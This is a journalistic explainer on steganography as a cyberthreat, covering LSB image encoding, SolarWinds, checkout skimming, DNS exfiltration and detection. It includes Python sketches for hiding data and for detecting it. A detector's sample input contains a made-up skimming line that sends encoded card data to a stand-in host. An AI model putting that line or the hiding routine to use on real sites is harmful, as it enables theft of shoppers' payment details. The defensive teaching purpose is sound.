Steganography is the practice of hiding sensitive or secret information inside something that appears ordinary. It’s also a hugely overlooked cyberthreat, according to Fred Mastrippolito, founder of cybersecurity firm Polito, Inc.
That’s because some cybercriminals prefer to sneak stolen data or malicious code in images, audio files and other normal-looking media to craftily evade detection.
What Is Steganography?
Cryptography makes information unreadable to outsiders even when they can see it. Steganography hides the fact that the information exists at all. A note written in a secret code is cryptography; a note written in invisible ink is steganography.
People exchanging private or sensitive information online use both methods. Apps including Zoom and WhatsApp use end-to-end encryption to encode messages, making them unreadable to anyone but the sender and the receiver. And residents of countries with internet censorship sometimes use steganography to bypass filters and firewalls.
Technically, any sort of cybercrime that tricks users into downloading malware by visiting a normal-looking, non-secret web page or clicking on an innocuous attachment falls under the umbrella of steganography.
But usually, hackers reserve the fancier forms of steganography — like hiding code in an image file — for one-off, strategic targets. When cybersecurity specialists use the term, it’s usually in reference to these more advanced or surprising applications.
“We have seen it from targeted attackers, more sophisticated groups that are really trying hard to not necessarily play a numbers game, but to focus on a particular organization and exfiltrate data from it,” Kaspersky security researcher Kurt Baumgartner said. “In the past, that’s taken extra effort and extra talent. So it wasn’t quite as common, but it is becoming more common.”
Steganography takes more work than other types of cybercrime, so it will always be a less popular option, Mastrippolito said. But, as hackers find new ways to cloak malicious code or stolen data, we’re likely to see more of it — if we notice it’s happening, that is.
How Does Steganography Work?
How steganography works depends on the type of information that’s hidden and the type of file or site it’s hidden in. Many steganography methods hide information in images, for instance.
(For an ancient example, consider exiled Spartan king Demaratus who, upon learning that Xerxes the Great was planning to invade his homeland, sent two wax-covered slates to Sparta with absolutely nothing written on them — or so it seemed, until Gorgo, Queen of Sparta, thought to look under the wax and discovered a secret warning.)
“There are a lot of different ways to implement steganography — or the code itself — into the images, it just depends on what method the actor who creates that piece of code wants to use,” said Jon Clay, VP of threat intelligence at Trend Micro.
Hackers can hide data inside images using a technique called least significant bit (LSB) encoding. This method uses tiny changes to an image’s digital data to encode secret values. This research paper provides a simple example: Imagine a grayscale image, with each of its pixels assigned a brightness value consisting of eight “bits,” or ones and zeros. The first eight pixels of the image may look like this:
01010010 01001010 10010111 11001100 11010101 01010111 00100110 01000011
Now, let’s say someone wanted to use steganography to send a message beginning with the letter Z. In standard ASCII, Z’s binary code is “01011010.” So, by overwriting the last (or “least significant”) bit of each pixel above with one bit of that code, they can send the letter Z to anyone who knows the technique. Each pixel’s value shifts by at most one, so the colors in the original image barely change.
Scale that approach to an image with thousands of pixels, and they could hide a longer message or lines of code.
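To make the idea concrete, here is a minimal sketch of LSB embedding and extraction applied to the eight pixel values listed above. The function names are invented for this illustration, and the sketch assumes the message is encoded as ASCII text with one message bit stored per pixel; real tools vary in how they order bits and choose pixels.

```python
def text_to_bits(text):
    """Encode text as ASCII and return its bits, most significant bit first."""
    return "".join(format(byte, "08b") for byte in text.encode("ascii"))


def bits_to_text(bits):
    """Inverse of text_to_bits: turn a bit string back into ASCII text."""
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return data.decode("ascii")


def embed_bits(pixels, bits):
    """Return a copy of pixels with each lowest bit overwritten by a message bit."""
    if len(bits) > len(pixels):
        raise ValueError("message needs more pixels than the image has")
    stego = list(pixels)
    for i, bit in enumerate(bits):
        # Clear the lowest bit, then set it to the message bit.
        stego[i] = (stego[i] & 0b11111110) | int(bit)
    return stego


def extract_bits(pixels, count):
    """Read the lowest bit of the first `count` pixels as a bit string."""
    return "".join(str(p & 1) for p in pixels[:count])


# The eight grayscale pixel values from the example above.
cover = [0b01010010, 0b01001010, 0b10010111, 0b11001100,
         0b11010101, 0b01010111, 0b00100110, 0b01000011]

message_bits = text_to_bits("Z")
stego = embed_bits(cover, message_bits)
recovered = bits_to_text(extract_bits(stego, len(message_bits)))

# No pixel value moves by more than one step of brightness.
max_change = max(abs(a - b) for a, b in zip(cover, stego))
print(recovered, max_change)
```

Only the lowest bit of each pixel is touched, which is why the altered image is hard to tell from the original by eye.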
Of course, hiding information in an image’s data only works if no one suspects the original image has been tampered with. The message is hidden, not encrypted, so anyone in the know could quickly extract it and see what data or code is inside.
How Is Steganography Used Today?
In 2018, cybersecurity Twitter freaked out a little when researcher David Buchanan figured out how to hide information in a JPEG image’s data in a way that made it past Twitter’s thumbnail compressor. Buchanan tweeted an image of William Shakespeare that, when downloaded and unzipped, contained the playwright’s complete works.
“I think most people were impressed, and surprised that it was possible, due to the assumption that Twitter strips all metadata from image uploads,” Buchanan said.
Three years after his initial discovery, he found a way to tack on hidden information to the end of a PNG image’s metadata on Twitter. This method was even better than his first, he wrote, because the data remained “contiguous,” or all in one chunk.
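For defenders, the simplest version of this trick is easy to check for. The sketch below does not reproduce Buchanan’s method and would not necessarily catch it. It only looks for the most basic case, in which extra bytes sit after the chunk that marks the end of a PNG file. The helper names and the tiny test image are made up for the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(chunk_type, data=b""):
    """Build one PNG chunk: length, type, data, then a CRC over type + data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def trailing_bytes(png):
    """Return whatever follows the IEND chunk, or b"" if nothing does."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    offset = len(PNG_SIGNATURE)
    while offset + 8 <= len(png):
        length, chunk_type = struct.unpack(">I4s", png[offset:offset + 8])
        offset += 8 + length + 4  # chunk header + data + CRC
        if chunk_type == b"IEND":
            return png[offset:]
    raise ValueError("no IEND chunk found")


# A 1x1 grayscale PNG built by hand so the example needs no image file.
ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
idat = zlib.compress(b"\x00\x00")  # filter byte + one black pixel
clean = (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
         + make_chunk(b"IDAT", idat) + make_chunk(b"IEND"))

# Hypothetical tampering: bytes that start like a ZIP archive, appended at the end.
extra = b"PK\x03\x04 hidden archive bytes"
tampered = clean + extra

print(len(trailing_bytes(clean)), len(trailing_bytes(tampered)))
```

Most image viewers ignore anything after the end marker, so a file like `tampered` still displays normally.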
Some security experts worried Buchanan’s Twitter techniques could help criminals attack companies or individuals, but Buchanan is unaware of any instances of that happening, he said.
Other attackers have put steganography to work, though. In early 2020, a group believed to be Russian hackers hid malware inside a legitimate software update from SolarWinds, maker of a popular IT infrastructure management platform. The hackers successfully breached Microsoft, Intel and Cisco, as well as multiple U.S. government agencies. Then, they used steganography to disguise the information they were stealing as XML files, Baumgartner explained.
For hackers, hiding malicious code in an image or audio file is only half the battle. They also need a malicious or buggy program on the target’s computer to run that code. That’s why criminals use steganography to deliver bad software into systems that have already been compromised.
For example, a cyber-thief might try to deliver a PNG filled with bad code to a browser with a known vulnerability in how it loads PNGs. Or a hacker might break into a corporation’s network and then use malicious PNGs to sneak past security features and deliver even more malware.
For steganographically hidden code to be executed, there must be another compromised program to first decrypt it, then transfer control to that code, Mastrippolito explained. Once the bad code is running, it might take screenshots, tweet, access the clipboard, monitor keystrokes or try to take over an account. Then, it will likely send data back to a command-and-control server with a cloaked location. This all takes place in the background — so the target is unlikely to notice it happening — but all the pieces must be in place.
In short: Steganographic attacks require two steps, and that’s why steganography is often reserved for targeted attacks instead of blanket ones. Each hidden payload must be designed for a specific compromised system, and, once it’s delivered, it has to actually run.
Examples of Steganography in Cyber Attacks
Dutch cybersecurity firm Sansec discovered in September of 2020 that cybercrime groups were using image steganography to steal payment information from online stores’ checkout pages.
This type of “skimming” attack is common. In it, hackers add malicious software into the code of a retailer’s checkout page. When a shopper enters their payment details, those details are recorded and sent to a server in a remote location. Sansec founder Willem de Groot said the firm has detected skimming malware on more than 50,000 online stores in the last six years.
There’s a bustling black market for that payment information, de Groot said.
“People hack into stores, people write malware, people provide third-party services to support this whole economic chain,” he explained.
And while thieves only earn between $5 and $30 for each intercepted credit card, a single person can target thousands of stores at once because the work — in this case, injecting the images and their malicious code — is almost entirely automated.
Some cybercriminals use steganography to break into a site or system — others use it to disguise the data they steal once they’re inside.
“Seeing [steganography] being used for exfiltrating and uploading stolen data is a little more unusual, but it does happen,” Baumgartner said.
For example, he’s seen bad actors disguise stolen data as outbound domain-name-system traffic, or the very common traffic that translates site and server names from human-speak into machine-speak.
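One rough way defenders look for data smuggled out in DNS lookups is to flag hostnames that contain unusually long, random-looking labels. The sketch below illustrates that heuristic only. The function names and both thresholds are assumptions chosen for the example, not values from Kaspersky or any product, and real traffic would need tuning to avoid false alarms.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Bits of entropy per character in text (0.0 for empty input)."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_tunneling(hostname, max_label_len=30, max_entropy=3.5):
    """Flag hostnames whose longest label is both long and random-looking.

    The two thresholds are illustrative guesses, not established cutoffs.
    """
    labels = hostname.rstrip(".").split(".")
    longest = max(labels, key=len)
    return len(longest) > max_label_len and shannon_entropy(longest) > max_entropy


for name in ["www.example.com",
             "mzxw6ytboi4tsmrrgq2dmnzyhe3tqojq.example.com"]:
    print(name, looks_like_tunneling(name))
```

Ordinary site names tend to be short and word-like, while encoded data packed into a lookup tends to be neither.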
A malvertising campaign hijacks ad-serving networks, injecting fake online ads to trick users into downloading malware. Clay has seen some of these campaigns use images to deliver their bad code.
“Steganography’s use within the [malvertising] threat community seems to be increasing,” he said. “We’ve seen a number of activities where the steganography malware has been inserted into the campaign at some stage.”
Tech companies have also used audio steganography — outside the frequency range that humans can hear — to communicate across devices. Amazon is suspected to have hidden an audio message in a Super Bowl commercial for voice assistant software Alexa to prevent viewers’ Amazon Echos from activating during the ad. And Indian ad company SilverPush got caught putting undetectable audio in TV and online ads so consumers’ phones could track which ads to retarget.
How Do Cybersecurity Specialists Detect Steganography?
Often, they don’t. By definition, effective steganography goes undetected.
But that doesn’t mean researchers aren’t trying. And advances in machine learning have made threat detection more accurate. Algorithms can ingest a bunch of data about how normal software behaves, which helps them notice abnormal software faster.
Sansec monitors more than a million online stores on a daily basis, de Groot said. Each morning, its machine-learning system flags anywhere from 50 to 100 stores with new malicious code added to their checkout pages. The Sansec team examines those sites manually, looking for any lessons that could improve its detection algorithms.
“Criminals come up with new methods every week,” de Groot said. “So it’s a very, very competitive cat-and-mouse game of staying ahead of the other party.”
Sansec flags potential steganographic attacks by checking for code that submits data to a different country than where a shop’s servers are located, for example, de Groot said. But criminals have “thousands of tricks” to disguise their code, and keeping up is difficult.
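The country check de Groot describes can be pictured with a toy example. This is not Sansec’s system. It is a sketch that assumes a lookup table mapping hosts to countries, where a real tool would rely on a GeoIP database; every hostname, country code and function name below is hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical host-to-country table standing in for a real GeoIP lookup.
# "ZZ" is a placeholder code for "some other country".
HOST_COUNTRY = {
    "shop.example": "NL",
    "payments.example": "NL",
    "cdn-stats.example": "ZZ",
}

URL_PATTERN = re.compile(r"https?://[^\s\"'<>)]+")


def foreign_endpoints(page_source, shop_country, host_country=HOST_COUNTRY):
    """Return URLs in page_source whose host maps to a different country."""
    flagged = []
    for url in URL_PATTERN.findall(page_source):
        host = urlparse(url).hostname
        country = host_country.get(host)
        # Unknown hosts are skipped here; a real system might flag them too.
        if country is not None and country != shop_country:
            flagged.append(url)
    return flagged


# Made-up checkout script: one legitimate payment call, one disguised upload.
checkout_js = """
fetch("https://payments.example/charge", {method: "POST", body: card});
new Image().src = "https://cdn-stats.example/pixel.png?d=" + btoa(card);
"""

flagged = foreign_endpoints(checkout_js, shop_country="NL")
print(flagged)
```

A check like this is easy to evade, for instance by building the URL at runtime, which is consistent with de Groot’s point that keeping up is difficult.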
“Sometimes it takes hours to really establish whether malware is present or not, so clever are these hiding techniques,” de Groot said.
Another red flag, according to Baumgartner, is suspicious-looking traffic. Why is this server suddenly communicating with Pastebin or a WordPress blog? Malware also sometimes leaves behavior- or memory-based bread crumbs on the host computer.
Is Malicious Steganography Avoidable?
“There’s no way the typical user could detect this is happening,” de Groot said. And plenty of websites don’t have the resources for dedicated security teams.
The best defense for consumers is to update apps and operating systems when updates are available. For businesses, it’s to train employees about the cybersecurity dangers of normal-looking image and audio files.
“They may have been educated that if you get an executable file in an attachment, don’t open it. If you get a zip file in an attachment, don’t open it,” Clay said. “But maybe they haven’t been trained that if you get a JPEG or a BMP, these can also harbor some malicious code.”
If that’s too much, just make sure employees know to be suspicious of any message that pressures them to open an attachment quickly.
“In normal business, your coworkers are not going to be very rigorous, saying, ‘Hey, you’ve got to open this,’” Clay said.
What’s Next for Steganographic Cybercrime?
As audio-based apps (like Clubhouse, for instance) gain popularity and more platforms add audio features to their repertoires, audio-based steganographic attacks are likely to happen more often, Clay guessed.
Expanded use of augmented reality might be a cause for concern too. Bad actors could hide malicious code inside real-world objects so that when they’re scanned by compromised AR software, they deliver malware. This would be a really big problem in a world where autonomous vehicles scan physical objects to make decisions about where and how to drive. Researchers at the University of Washington and other institutions have already published a paper outlining how black-and-white stickers on stop signs can cause the computer-vision algorithms in self-driving cars to misfire.
The good news is steganography is expensive to develop and tough to deploy. The bad news is it occasionally works, so cybercriminals will keep looking for new ways to use it.
“With this specific crime, the real challenge is happening behind the scenes, it’s out of view for most people,” de Groot said. “But the challenge is real, and a lot of people are working day and night to stay ahead of the other party.”
Dawn Kawamoto contributed reporting to this story.